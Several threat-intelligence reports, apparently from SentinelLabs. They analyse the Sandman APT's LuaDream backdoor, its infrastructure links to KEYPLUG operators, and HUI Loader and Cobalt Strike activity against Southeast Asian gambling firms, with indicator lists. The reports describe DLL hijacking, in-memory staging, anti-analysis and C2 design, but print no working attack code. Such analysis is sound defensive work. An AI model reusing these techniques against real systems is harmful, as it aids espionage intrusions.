The findings we present are yet another showcase of the complex nature of the China-based threat landscape. As exemplified by Sandman and STORM-0866/Red Dev 40, this landscape is marked by substantial cooperation and coordination among its constituent threat groups, along with the possibility of third-party vendors supplying the operational teams with tooling. This makes accurate clustering challenging. Therefore, while acknowledging the association of Sandman with the suspected China-based adversaries using KEYPLUG, we continue to track Sandman as a distinct cluster until further conclusive information suggesting otherwise becomes available.

Lua-based modular backdoors, such as LuaDream, have been observed relatively rarely and often in the context of espionage-motivated APTs historically considered Western or Western-aligned. Our findings on Sandman indicate that the Lua development paradigm is being adopted by a broader set of cyberespionage threat actors for the modularity, portability, and simplicity that the Lua scripting language offers.

Sandman and STORM-0866/Red Dev 40 Infrastructure

The SSL certificate assigned to the LuaDream C2 domain ssl.explorecell[.]com has also been used on the servers with IPs of 185.51.134[.]27 (between March and April 2023) and 45.80.148[.]151 (in March 2023). 185.51.134[.]27 is allocated to the Estonian VPS service provider EstNOC and 45.80.148[.]151 to the Romanian provider HOSTGW SRL. ssl.explorecell[.]com last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

  • Thumbprint: fc8fdf58cd945619cbfede40ba06aada10de9459
  • Serial number: 364670096077097330220756280372394037039639
  • Common Name: ssl.explorecell[.]com

Approximately 4 months later (in August 2023), the server at 185.51.134[.]27 used an SSL certificate issued for the domain dan.det-ploshadka[.]com. This domain last resolved to 79.110.52[.]160, a server hosted by the Romanian service provider M247.

  • Thumbprint: a7932112b7880c95d77bc36c6fcced977f4a5889
  • Serial number: 365025056055127017786055050446086862849019
  • Common Name: dan.det-ploshadka[.]com

Microsoft and PwC have observed dan.det-ploshadka[.]com being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40. This assessment is primarily based on the use of RC4 keys for encrypting C2 data that are unique to STORM-0866/Red Dev 40 as well as used known STORM-0866/Red Dev 40 malware in the intrusions.

The dan.det-ploshadka[.]com certificate has also been used on the servers with IPs 45.90.59[.]17 (between July and September 2023), 45.129.199[.]122 (in September 2023), and 146.70.157[.]20 (in June 2023).

Another certificate, issued for the domain ssl.e-novauto[.]com, was also used on 146.70.157[.]20 in May 2023. ssl.e-novauto[.]com, which has an overlap in subdomain naming convention with the ssl.explorecell[.]com Sandman domain, last resolved to 172.67.216[.]63 (an IP address of a Cloud-based reverse proxy infrastructure). 146.70.157[.]20 is allocated to the Romanian hosting service provider M247.

  • Thumbprint: b6d759c9ea5d2136bacb1b2289a31c33500c8de8
  • Serial number: 59961237898726280462746217792430024401815283068
  • Common Name: ssl.e-novauto[.]com

In common with dan.det-ploshadka[.]com, Microsoft and PwC have observed theย  ssl.e-novauto[.]com domain being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40.

Among the other server IPs on which the ssl.e-novauto[.]com certificate was used (5.255.88[.]188 in October 2022; 5.2.67[.]176 between March and May 2023; 5.2.72[.]130 in April 2022; 37.120.140[.]205 between March 2022 and May 2023; and 185.38.142[.]129 between October 2022 and January 2023), 5.2.67[.]176 has been the resolving IP for the ssl.articella[.]com domain since January 2023. This domain has an overlap in naming convention with the ssl.e-novauto[.]com STORM-0866/Red Dev 40 domain and the ssl.explorecell[.]com Sandman domain.

Infrastructure overview
Infrastructure overview

PwC tracks STORM-0866/Red Dev 40 as a distinct cluster from the other threat groups using the KEYPLUG malware based on their frequent use of Cloud-based reverse proxy infrastructure, likely as an operational security measure to avoid exposing the true hosting locations. We observed this in the context of Sandman as well, noting a shift from using a directly exposed C2 server IP address (C2 domain: ssl.explorecell[.]com) to address of a reverse proxy infrastructure (C2 domain: mode.encagil[.]com).

The overlap of unique infrastructure control and management practices, hosting provider selections, and domain naming conventions, indicates a likely relation between the Sandman and the STORM-0866/Red Dev 40 APT clusters from an infrastructure perspective.

LuaDream and KEYPLUG

LuaDream and KEYPLUG are distinct malware strains. KEYPLUG is implemented in C++, whereas the majority of the LuaDream functionalities are implemented in Lua. The samples that we analyzed do not share straightforward indicators that would confidently classify them as closely related or originating from the same source, such as use of identical encryption keys or direct overlaps in implementation. However, we observed indicators of shared development practices and some overlaps in functionalities and design, suggesting shared functional requirements by the operators. This is not uncommon in the Chinese malware landscape.

We also observed a code comment in Chinese in the main_proto_WinHttpServer component of LuaDream version 11.0.2.1.23.1, indicating potential Chinese origin. However, we note that all other LuaDream string artifacts (function and variable names, and code comment, status, and error reporting strings) are formulated in English.

Code comment in LuaDream (translates from Chinese to โ€œreturned handleโ€)
Code comment in LuaDream (translates from Chinese to โ€œreturned handleโ€)

LuaDream is likely still in active development. It remains to be seen whether further iterations of the malware and its plugins will share implementation overlaps, functionality or design patterns with KEYPLUG or other malware strains of suspected Chinese origin.

C2 Protocols

LuaDream and KEYPLUG are highly modular and multi-protocol in design, both implementing support for the HTTP, TCP, WebSocket, and QUIC protocols for C2 communication. The combination of QUIC and WebSocket is a relatively rare backdoor feature and its implementation in both LuaDream and KEYPLUG may be the result of a shared functional requirement by the backdoorsโ€™ operators.

The order in which LuaDream and KEYPLUG evaluate the configured protocol among HTTP, TCP, WebSocket, and QUIC is the same: HTTP, TCP, WebSocket, and QUIC in that order. The LuaDream keyword HTTPS2 refers to WebSocket and KEYPLUG implements additional support for UDP. We do not exclude the possibility for future versions of LuaDream to support UDP as well.

LuaDream: Protocol handling
LuaDream: Protocol handling

KEYPLUG: Protocol handling
KEYPLUG: Protocol handling

For each protocol, both LuaDream and KEYPLUG implement internal structures that store client data, such as the handles to the established sockets to the C2 servers.

Execution Flow and C2 Data Management

The high-level execution flows of LuaDream and KEYPLUG are very similar. Both backdoors first gather and exfiltrate system and user information in designated functions, with overlaps in gathered information (for example, MAC address, OS version, IP address, computer name, and username).

LuaDream and KEYPLUG then instantiate threads designated for sending and receiving C2 data, establish connection to the C2 server, and continue to process backdoor commands and manage plugins. Plugin management includes loading and unloading plugins.

The backdoors use global data buffers designated for storing data to be sent to the C2 server, and data received from the server. LuaDream and KEYPLUG read from the global buffers that store incoming C2 data and continue processing it when available.

LuaDream and KEYPLUG store in designated internal structures overlapping information about the global buffers, such as starting memory addresses, sizes, and pointers to Windows CRITICAL_SECTION structures. LuaDream defines this structure as _MEM_DATA_CACHE_.

LuaDream: Global buffer structure (decompiled LuaJIT bytecode)
LuaDream: Global buffer structure (decompiled LuaJIT bytecode)

KEYPLUG: Global buffer structure (IDA-defined structure)
KEYPLUG: Global buffer structure (IDA-defined structure)

LuaDream and KEYPLUG implement designated functions for reading from, and writing to, these buffers. These functions synchronize buffer access by multiple threads using Windows Critical Sections.

LuaDream: Reading C2 data from a global buffer (LuaDream)
LuaDream: Reading C2 data from a global buffer

KEYPLUG: Reading C2 data from a global buffer
KEYPLUG: Reading C2 data from a global buffer

Throughout their execution, both LuaDream and KEYPLUG generate one-time integer values based on the system uptime returned by the GetTickCount function. The backdoors calculate these values by applying modulo and/or addition operations to the system uptime. Some overlapping uses of the generated values are as sleep time intervals or protocol-specific keys, such as the Sec-WebSocket-Key packet header field that is used in the WebSocket opening handshake.

LuaDream: Sleep interval
LuaDream: Sleep interval

KEYPLUG: Sleep interval
KEYPLUG: Sleep interval

Conclusions

We assess that there are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular. This highlights the complex nature of the Chinese threat landscape. Its constituent threat actors will almost certainly continue to cooperate and coordinate, exploring new approaches to upgrade the functionality, flexibility, and stealthiness of their malware. The adoption of the Lua development paradigm is a compelling illustration of this.

Navigating the threat landscape calls for continuous collaboration and information sharing within the threat intelligence research community. SentinelLabs remains committed to this mission and is grateful to our industry partners involved in this collective endeavor.

Indicators of Compromise

Domains

dan.det-ploshadka[.]com KEYPLUG C2 server
mode.encagil[.]com LuaDream C2 server
ssl.articella[.]com Suspected KEYPLUG or LuaDream C2 server
ssl.e-novauto[.]com KEYPLUG C2 server
ssl.explorecell[.]com LuaDream C2 server
yum.luxyries[.]com KEYPLUG C2 server

IP Addresses

146.70.157[.]20 KEYPLUG C2 server (based on known C2 certificates)
172.67.216[.]63 KEYPLUG C2 server
185.38.142[.]129 KEYPLUG C2 server (based on a known C2 certificate)
185.51.134[.]27 LuaDream and KEYPLUG C2 (based on known C2 certificates)
185.82.218[.]230 LuaDream C2 server
37.120.140[.]205 KEYPLUG C2 server (according to a known C2 certificate)
45.129.199[.]122 KEYPLUG C2 server (based on a known C2 certificate)
45.80.148[.]151 LuaDream C2 (based on a known C2 certificate)
45.90.59[.]17 KEYPLUG C2 server (according to a known C2 certificate)
5.2.67[.]176 KEYPLUG C2 server (based on a known C2 certificate)
5.2.72[.]130 KEYPLUG C2 server (based on a known C2 certificate)
5.255.88[.]188 KEYPLUG C2 server (based on a known C2 certificate)
79.110.52[.]160 KEYPLUG C2 server

Certificate Thumbprints

a7932112b7880c95d77bc36c6fcced977f4a5889 KEYPLUG C2
b6d759c9ea5d2136bacb1b2289a31c33500c8de8 KEYPLUG C2
fc8fdf58cd945619cbfede40ba06aada10de9459 LuaDream C2

Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit

21 September 2023 at 19:50

By Aleksandar Milenkoski, in collaboration with QGroup

Executive Summary

  • SentinelLabs has observed a new threat activity cluster by an unknown threat actor we have dubbed Sandman.
  • Sandman has been primarily targeting telecommunication providers in the Middle East, Western Europe, and the South Asian subcontinent.
  • The activities are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.
  • Sandman has deployed a novel modular backdoor utilizing the LuaJIT platform, a relatively rare occurrence in the threat landscape. We refer to this malware as LuaDream.
  • The implementation of LuaDream indicates a well-executed, maintained, and actively developed project of a considerable scale.
  • At this time, we donโ€™t have a consistent sense of attribution. LuaDream does not appear to be related to any known threat actors. While the development style is historically associated with a specific type of advanced threat actor, inconsistencies between the high-end development of the malware and poor segmentation practices lead us towards the possibility of a private contractor or mercenary group similar to Metador.

Overview

In collaboration with QGroup GmbH, SentinelLabs observed over August 2023 a threat activity cluster targeting the telecommunication sector. The activities have been conducted by a threat actor of unknown origin using a novel modular backdoor based on the LuaJIT platform. We dub this threat actor and the backdoor Sandman and LuaDream in reference to what we suspect to be the backdoorโ€™s internal name โ€“ DreamLand client.

The activities we observed are characterized by strategic lateral movement to specific targeted workstations and minimal engagement, suggesting a deliberate approach aimed at achieving the set objectives while minimizing the risk of detection.

The implementation and architecture of LuaDream suggest a maintained, versioned project under active development. This is a modular, multi-protocol backdoor whose main functionalities are:

  • exfiltrating system and user information, paving the way for further precision attacks;
  • managing attacker-provided plugins that extend LuaDreamโ€™s features.

Although the intrusions were detected and interrupted before the threat actor could deploy plugins, our analysis of LuaDream staging samples shared on VirusTotal provided a glimpse into what functionalities the plugins may implement, with command execution capabilities being one example.

The 36 distinct LuaDream components we identified and the support for multiple protocols for C2 communication indicate a project of a considerable scale. The LuaDream staging chain is designed to evade detection and thwart analysis while deploying the malware directly into memory. LuaDreamโ€™s implementation and staging process leverage the LuaJIT platform, the just-in-time compiler for the Lua scripting language. This is primarily to make malicious Lua script code difficult to detect.

A Penchant for Telcos

Based on current visibility, accurate clustering remains a challenge. The focussed, strategy-driven activities, and the use of complex malware designed to evade detection point to a motivated and capable adversary. The TTPs, victimology, and the characteristics of the deployed malware indicate that it is highly likely this activity has espionage motivations. Communication providers are frequent targets of espionage activity due to the sensitive data they hold.

The activity cluster we observed and examination of C2 netflow data indicate a pronounced focus on targeting telecommunications providers with a broad geographical distribution, including the Middle East, Western Europe, and the South Asian subcontinent.

Geographical distribution of victims
Geographical distribution of victims

Compilation timestamps and a string artifact found within LuaDream hint at potential malware development efforts over the first half of 2022, suggesting possible threat actor activity dating back to 2022.

While we cannot associate LuaDream to any known threat actor, we lean towards the possibility of a private contractor or mercenary group. Typically used as a scripting middleware in gaming and specialty embedded applications and appliances, the use of LuaJIT in the context of APT malware is relatively rare but the population using it is becoming broader.

Embedded Lua VMs serve as a mechanism for modularity and extensibility for advanced APTs, historically considered Western or Western-aligned. However, this development paradigm is being embraced by a broader set of threat actors that also target Western countries and deserves further scrutiny as exemplified by the Sandman APT. Our talk at LABScon 2023 described this paradigm of development overtime, bookended by our discovery of Sandman APT as the latest, along with Fast16 as the earliest example dating back to 2005.

In March 2023, new malware was briefly described by Kaspersky during a quarterly roundup actively targeting a government entity in Pakistan. Based on the sparsely described characteristics, we assess that theyโ€™re referring to a variant of LuaDream โ€“dubbed DreamLand. Note the following string in the LuaDream samples we identified:

C:\\project\\tenyears\\DreamLandClient\\Project\\cpp\\HttpClientLj\\testdll.dll

Threat Actor Activities

The activities we observed took place over several weeks in August 2023. After stealing administrative credentials and conducting reconnaissance, Sandman infiltrated specifically targeted workstations using the pass-the-hash technique over the NTLM authentication protocol. On one of the targets, all of the workstations were assigned to personnel in managerial positions.

On average, we observed a five-day gap between infiltrations into different endpoints. After gaining access, Sandman limited its activities to deploying folders and files required for loading and executing LuaDream, refraining from any further actions. We observerd the following deployed filesystem artifacts:

C:\Windows\System32\ualapi.dll
C:\ProgramData\FaxConfig\fax.dat
C:\ProgramData\FaxConfig\fax.cache
C:\ProgramData\FaxConfig\fax.module
C:\ProgramData\FaxConfig\fax.Application
C:\ProgramData\FaxLib\

Sandman abused the DLL hijacking technique to execute LuaDream. The ualapi.dll file they placed is a malicious DLL masquerading as its legitimate counterpart (a User Access Logging (UAL) component) and represents the first stage of the intricate LuaDream loading process. The ualapi.dll library is loaded by the Fax and the Spooler Windows service when started. We observed the Spooler service loading the malicious ualapi.dll on the targeted workstations, executing LuaDream in its context.

It is relevant to note that we did not observe the threat actor restarting the Fax and or Spooler service to force the execution of LuaDream, likely to evade detection based on service manipulation. Instead, they were patient in waiting for one of these services to load the malicious ualapi.dll when started at the next system boot.

LuaDream | Staging

The LuaDream staging process is intricate and designed with a focus on evading detection and thwarting analysis. Initiated by the Fax or the Spooler service, which would execute the UalStart export of the malicious ualapi.dll when started, the overall process consists of seven main stages. These are conducted fully in memory and involve a combination of fully-formed DLL PE images, code, and LuaJIT bytecode.

The following table shows DLL images involved in LuaDream staging:

Name Compilation timestamp Exports
ualapi.dll Wed Aug 09 18:24:18 2023 UalInstrument, UalStart, UalStop
MemoryLoadPex64.dll Wed Mar 22 23:55:07 2023 ProtectMain
common.dll Wed Aug 09 18:21:18 2023 jsadebugd

Although the DLL timestamps could have been manipulated by the threat actor, given the proximity to the August 2023 intrusion date, it is likely that the timestamps are authentic. Due to the difference of only a few days between the timestamps of ualapi.dll and common.dll, and their actual deployment dates, it is possible that these images have been built specifically for this intrusion.

Some of the implemented anti-analysis measures include hiding LuaDreamโ€™s threads from a debugger using the NtSetInformationThread function, file close operation on an invalid handle (0x123456), detection of Wine-based sandboxes, and in-memory mapping of malicious PE images to evade EDR API hooks and file-based detections.

LuaDream staging
LuaDream staging

Next-stage code is typically packed using a combination of XOR-based encryption and compression. The fax.dat, fax.Application, and fax.module files store packed staging code. The code unpacked from fax.Application contains a LuaJIT engine enabling the execution of the LuaJIT components internally referred to as interface and crt as well as LuaDream itself.

interface unpacks crt from fax.module, which in turn retrieves XML-formatted configuration and the contents of the fax.cache file โ€“ an encrypted and compressed Lua function, which returns the reference names and implementations of LuaDream components in Base-64 encoded form.

fax.cache (unpacked form)
fax.cache (unpacked form)

The LuaDream configuration includes C2 and communication protocol information. The LuaDream variant we analyzed is configured to communicate with the mode.encagil[.]com domain over the WebSocket protocol.

Configuration data
Configuration data

LuaDream | Overview

LuaDream is a multi-component and multi-protocol backdoor, whose main features are managing attacker-provided plugins and exfiltrating system and user information. The implementation and architecture of LuaDream indicates that it is a maintained, actively developed project of a considerable scale.

Throughout our analysis, we observed what is likely a malware version string (12.0.2.5.23.29), which the backdoor sends to the C2 server when exfiltrating information. Many LuaDream function and variable definitions follow a naming convention involving the word fun, such as dofun,ย  _RUN_FUN_LIST_, and FunGetDataCache.

LuaDream implements testing functions as well as error and execution status logging, which indicates that the malware is likely still in active development. A string artifact in a function labeled com_TestJson suggests potential development in June 2022.



Testing functions (decompiled LuaJIT bytecode)
Testing functions (decompiled LuaJIT bytecode)

We observed the embedded private IP address 10.2.101[.]99 to which LuaDream binds the communication port 4443, if so configured. This address does not belong to the IP address spaces of the targeted environments. The IP address may be a leftover from an in-development LuaDream variant or from a previous Sandman engagement.

LuaDream | Components And Features

The LuaDream variant we obtained from the targeted environments consists of 34 components: 13 core and 21 support components. They are implemented in LuaJIT bytecode and use the Windows API through the ffi library using C language bindings.

The support components implement Lua libraries as well as Windows API definitions required for LuaDreamโ€™s operation, such as xml2lua, Windows Sockets, and NtSec API.

The core components implement LuaDream features, such as initialization, gathering system and user information, C2 communication, and plugin management. As per the component definitions from the fax.cache file, the core LuaDream components are structured into two categories: .com and .main.

LuaDream core components
LuaDream core components

With the main component initializing LuaDream, the backdoor connects to the configured C2 server and exfiltrates system, user, and malware-related information gathered by BGetSystemMsg. This information includes the malware version, assigned IP and MAC addresses, OS version, available memory, and the name, PID, and username associated with the process in whose context LuaDream runs.

Exfiltrated information
Exfiltrated information

LuaDream has the capability to reach out to C2 servers but also to act as an implant listening for incoming connections. The backdoor can communicate over the TCP, HTTPS, WebSocket, and QUIC protocols. The main_proto_X_TcpClient, main_proto_WinHttpClient, main_proto_X_WebSocketClient, and main_proto_X_QuicClient components implement support for these protocols, with main_z_protoInterface acting as their main handler.

Protocol handling (decompiled LuaJIT bytecode)
Protocol handling (decompiled LuaJIT bytecode)

The main_proto_A_QueryDns component resolves domains to IP addresses using the cloudflare-dns[.]com service, which main_proto_X_WebSocketClient uses for resolving C2 domain names.

main_proto_X_QuicClient draws functionalities from a DLL image which LuaDream maps fully in memory, a functionality implemented by the Acom_LoadDLL component.

LuaDream communicates with a C2 server using the thread_connect, thread_send, and thread_recv components, which are responsible for connecting to, sending data to, and receiving data from the C2 server, respectively. These components operate in separate threads. The exchanged data is in JSON and XML format, in an encrypted and compressed form. The Acom_define component provides functionalities for inter-thread communication and data manipulation.

The thread_recv component handles incoming messages and its main purpose is to manage attacker-provided plugins that extend LuaDream. Some functionalities of this component include:

  • taking LuaDream offline (command offline);
  • loading, executing (command loadplugin), unloading (command unloadplugin), and saving plugins (command saveplugin);
  • executing an attacker-specified plugin functionality.

LuaDream maintains a key-based list of plugin information, which includes the handle and the ID of the thread in which the plugin runs, and a plugin-identifying key. Loading of a plugin involves inserting a new entry in this list and executing plugin code in a designated thread. For communicating with plugins, LuaDream leverages inter-thread communication, using the message 1234 for executing plugin functionalities.

LuaDream plugin list (from decompiled LuaJIT bytecode)
LuaDream plugin list (from decompiled LuaJIT bytecode)

Our analysis of LuaDream staging samples shared on VirusTotal revealed the existence of two additional components named main_proto_WinHttpServer and thread_test. main_proto_WinHttpServer implements a LuaDream capability to listen for incoming connections based on the Windows HTTP server API. thread_test implements functions for testing the loadplugin and saveplugin commands. These functions indicate the existence of a plugin named cmd, whose name suggests command execution capabilities.

cmd plugin references
cmd plugin references

Network Infrastructure

The LuaDream samples we analyzed communicate with the C2 servers ssl.explorecell[.]com and mode.encagil[.]com. ssl.explorecell[.]com is a Tucows-registered domain with a first-seen resolution date of March 2023. This domain last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

mode.encagil[.]com is an Arsys-registered domain with a first-seen resolution date of August 2023. The domain last resolved to 172.67.173[.]208 and 104.21.47[.]226, IP addresses of a server hosted behind a major load balancing platform. The shift from using a directly exposed C2 server IP address to addresses of a load balancing infrastructure marks a change in Sandmanโ€™s infrastructure management practices โ€“ likely to avoid exposing the true hosting location.

Examination of C2 netflow data revealed lack of comprehensive C2 infrastructure segmentation, with several LuaDream deployments at geographically dispersed victim environments communicating with the same C2 server.

Conclusions

Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.

Navigating the shadows of the threat landscape necessitates consistent cooperation and information sharing within the threat intelligence research community. SentinelLabs remains dedicated to this mission and hopes that this publication will serve as a catalyst for further collaborative efforts. We are grateful for the contributions of Luca Palermo from the SentinelOne EMEA IR TAM team, who assisted with the initial investigations and remediation of the threat.

Indicators of Compromise

SHA1 File name
1cd0a3dd6354a3d4a29226f5580f8a51ec3837d4 fax.dat
27894955aaf082a606337ebe29d263263be52154 fax.Application
5302c39764922f17e4bc14f589fa45408f8a5089 ualapi.dll
77e00e3067f23df10196412f231e80cec41c5253 fax.cache
b9ea189e2420a29978e4dc73d8d2fd801f6a0db2 UpdateCheck.dll
fb1c6a23e8e0693194a365619b388b09155c2183 updater.ver
ff2802cdbc40d2ef3585357b7e6947d42b875884 fax.module

LuaDream Folder File paths
%ProgramData%\FaxConfig
%ProgramData%\FaxLib

C2 Server Domains
mode.encagil[.]com
ssl.explorecell[.]com

Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector

17 August 2023 at 09:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs has identified suspected-Chinese malware and infrastructure potentially involved in China-associated operations directed at the gambling sector within Southeast Asia.
  • The threat actors drop Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons.
  • Weโ€™ve observed related malware using the signature of a likely stolen code signing certificate issued to PMG PTE LTD, a Singapore-based vendor of Ivacy VPN services.
  • Indicators point to the China-aligned BRONZE STARLIGHT group; however, the exact grouping remains unclear due to the interconnected relationships among various Chinese APT groups.

Overview

Thriving after Chinaโ€™s crackdown on its Macao-based gambling industry, the Southeast Asian gambling sector has become a focal point for the countryโ€™s interests in the region, particularly data collection for monitoring and countering related activities in China.

We observed malware and infrastructure likely related to China-aligned activities targeting this sector. The malware and infrastructure we analyze are related to indicators observed in Operation ChattyGoblin and are likely part of the same activity cluster. Operation ChattyGoblin is ESETโ€™s name for a series of attacks by China-nexus actors targeting Southeast Asian gambling companies with trojanized Comm100 and LiveHelp100 chat applications.

The targeting, used malware, and C2 infrastructure specifics point to past activities that third parties have linked to the China-aligned BRONZE STARLIGHT group (also known as DEV-0401 or SLIME34). This is a suspected Chinese โ€˜ransomwareโ€™ group whose main goal appears to be espionage rather than financial gain, using ransomware as means for distraction or misattribution. Team T5 has also reported on BRONZE STARLIGHTโ€™s politically-motivated involvement in targeting the Southeast Asian gambling industry.

Despite the indicators observed, accurate clustering remains challenging. The Chinese APT ecosystem is plagued by extensive sharing of malware and infrastructure management processes between groups, making high confidence clustering difficult based on current visibility. Our analysis has led us to historical artifacts that represent points of convergence between BRONZE STARLIGHT and other China-based actors, which showcases the complexity of a Chinese threat ecosystem composed of closely affiliated groups.

Background

ESET reported that a ChattyGoblin-related attack in March 2023 targeted the support agents of a gambling company in the Philippines. In the attack, a trojanized LiveHelp100 application downloaded a .NET malware loader named agentupdate_plugins.exe. The final payload was a Cobalt Strike beacon using the duckducklive[.]top domain for C2 purposes. The hash of this malware loader was not disclosed.

We subsequently identified malware loaders that we assess are closely related to those observed as part of Operation ChattyGoblin and are likely part of the same activity cluster โ€“ a .NET executable also named agentupdate_plugins.exe and its variant AdventureQuest.exe.

This association is based on naming conventions, code, and functional overlaps with the sample described in ESETโ€™s report. Although we cannot conclusively determine whether the agentupdate_plugins.exe we analyzed is the same as that reported by ESET, we note that one of its VirusTotal submissions is dated March 2023 and originates from the Philippines. This aligns with the geolocation of the target and the timeline of the ChattyGoblin-related attack involving agentupdate_plugins.exe.

The Malware Loaders

agentupdate_plugins.exe andย  AdventureQuest.exe ย deploy .NET executables based on the SharpUnhooker tool, which download second-stage data from Alibaba buckets hosted at agenfile.oss-ap-southeast-1.aliyuncs[.]com and codewavehub.oss-ap-southeast-1.aliyuncs[.]com. The second-stage data is stored in password-protected zip archives.

The zip archives downloaded by agentupdate_plugins.exe and AdventureQuest.exe contain sideloading capabilities. Each of the archives we were able to retrieve consists of a legitimate executable vulnerable to DLL search order hijacking, a malicious DLL that gets sideloaded by the executable when started, and an encrypted data file named agent.data.

The executables are components of the software products Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan. The malicious DLLs masquerade as their legitimate counterparts:ย  They export functions with the same names, such that specific functions, when invoked by the legitimate executables, decrypt and execute code embedded in the data files. The data files we could retrieve implement Cobalt Strike beacons.

Zip archiveย  Archive content Final payload
adobe_helper.zip (agentupdate_plugins.exe) Adobe CEF Helper.exe libcef.dll agent.data (not available) /
cefhelper.zip (AdventureQuest.exe) identity_helper.exe msedge_elf.dll agent.data Cobalt Strike C2: www.100helpchat[.]com
Agent_bak.zip (AdventureQuest.exe) mfeann.exe LockDown.dll agent.data Cobalt Strike C2: live100heip[.]com

The 100helpchat[.]com and live100heip[.]com C2 domains follow the naming conventionย of the LiveHelp100 trojanized application used in operation ChattyGoblin, possibly to make malicious network activity look like legitimate LiveHelp100 activity.

agentupdate_plugins.exe and AdventureQuest.exe implement geofencing based on the ifconfig.co IP-based geolocation service. The loaders are meant to stop their execution if they are run on a machine located in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. This may indicate that the threat actors have no interest in intrusions in these countries for this campaign. Due to errors in implementation, the geofencing fails to work as intended.

Stolen Ivacy VPN Certificate

AdventureQuest.exe is signed using a certificate issued to the Ivacy VPN vendor PMG PTE LTD:

  • Thumbprint: 62E990CC0A26D58E1A150617357010EE53186707
  • Serial number: 0E3E037C57A5447295669A3DB1A28B8A.

Ivacy has been present on the market since 2007 and attracts users with low-price offerings.

It is likely that at some point the PMG PTE LTD singing key has been stolen โ€“ a familiar technique of known Chinese threat actors to enable malware signing. VPN providers are critical targets, since they enable threat actors to potentially gain access to sensitive user data and communications.

At the time of writing, we have not observed any public statements by PMG PTE LTD clarifying the circumstances that have led to the use of their signing keys for signing malware. The DigiCert Certificate Authority has revoked the compromised certificate after a public discussion on the issue.

HUI Loader

The malicious DLLs libcef.dll, msedge_elf.dll, and LockDown.dll distributed by agentupdate_plugins.exe and AdventureQuest.exe are HUI Loader variants. HUI Loader is a custom malware loader shared between several China-nexus groups. The loader is executed through sideloading by legitimate executables vulnerable to DLL hijacking and stages a payload stored in an encrypted file. HUI Loader variants may differ in implemented payload staging and execution techniques as well as additional functionalities, such as establishing persistence and disabling security features.

libcef.dll, msedge_elf.dll, and LockDown.dll closely resemble HUI Loader variants observed in a string of cyberespionage and ransomware operations that third parties have linked to APT10, TA410, and BRONZE STARLIGHT.

Threat actor Description
BRONZE STARLIGHT
Aliases: DEV-0401, SLIME34
A China-based ransomware operator active since 2021. The group is known for deploying a variety of ransomware families, such as LockFile, AtomSilo, NightSky, LockBit 2.0, and Pandora, and shares tooling with APT10. BRONZE STARLIGHTโ€™s main goal is suspected to be espionage rather than financial gain, using ransomware as means for distraction or misattribution.
APT10
Aliases: BRONZE RIVERSIDE, MenuPass
A China-nexus cyberespionage group active since at least 2009. The group focuses on targeting entities considered strategically important by the Chinese state.
TA410 A China-nexus cyberespionage group loosely linked to APT10, tracked as a distinct entity. The group is mostly known for targeting the US utilities sector and Middle Eastern governments.

APT10 and TA410 Operations

The cef_string_map_key function of libcef.dll downloaded by agentupdate_plugins.exe references the C:\Users\hellokety.ini file.

The cef_string_map_key function
The cef_string_map_key function

HUI Loader variants with this exact artifact have been reported as part of several cyberespionage operations:

  • enSilo (now Fortinet) has disclosed cyberespionage activities in Southeast Asia observed in April 2019 and attributed them with medium confidence to APT10.
  • Researchers from Macnica, Secureworks, and Kaspersky have presented on A41APT campaign activity conducted throughout 2021. A41APT is a long-running cyberespionage campaign targeting Japanese companies and their overseas branches. Kaspersky has attributed earlier A41APT activity (from March 2019 to the end of December 2020) with high confidence to APT10. TrendMicro has attributed A41APT activity over 2020 and 2021 to a group they track as Earth Tengshe, noting that Earth Tengshe is related to APT10 with some differences in employed TTPs.
  • ESET has presented on TA410 activities, noting the hellokety.ini artifact in this context. ESET also notes the possibility of misattribution the April 2019 activities reported by Fortinet to APT10 instead of TA410.
HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations
HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations

BRONZE STARLIGHT Operations

Since around 2021, HUI Loader variants have been deployed in operations involving the ransomware families LockFile (Symantec, 2021; NSFOCUS, 2021), AtomSilo (Sophos, 2021), NightSky (Microsoft, 2021), LockBit 2.0 (SentinelLabs, 2022), and Pandora (TrendMicro, 2022). Some of these operations have been attributed to BRONZE STARLIGHT by the organizations disclosing them and all of them collectively by Secureworks. All of these ransomware families have been noted by Microsoft as being part of the BRONZE STARLIGHT arsenal in time intervals aligning with those of the previously mentioned operations.

C2 Infrastructure

The Cobalt Strike C2 GET and POST URIs associated with the Operation ChattyGoblin domain duckducklive[.]top contain /functionalStatus and /rest/2/meetings, respectively. Their uncommon full forms closely resemble those observed by Secureworks in AtomSilo, Night Sky, and Pandora operations they attribute to BRONZE STARLIGHT. The researchers reported that, as of June 2022, they had not seen this Cobalt Strike configuration associated with other ransomware families. The threat actors have likely adapted a public Cobalt Strike malleable C2 profile available in a Github repository of the user xx0hcd.

Cobalt Strike C2 POST URI Relation
/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx Operation ChattyGoblin
/rest/2/meetingsVDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W AtomSilo
/rest/2/meetingsQpmhJveuV1ljApIzpTAL Night Sky
/rest/2/meetingsKdEs85OkdgIPwcqbjS7uzVZKBIZNHeO4r5sKe Pandora

The C2 GET and POST URIs associated with the www.100helpchat[.]com and live100heip[.]com domains we observed contain /owa followed by character strings. The format of these strings resembles those in the URIs associated with duckducklive[.]top and also those reported in past BRONZE STARLIGHT activities. It is likely that the threat actors have adapted another open source Cobalt Strike malleable C2 profile, which is also available in a Github repository of the user xx0hcd.

Domain Cobalt Strike C2 URIs
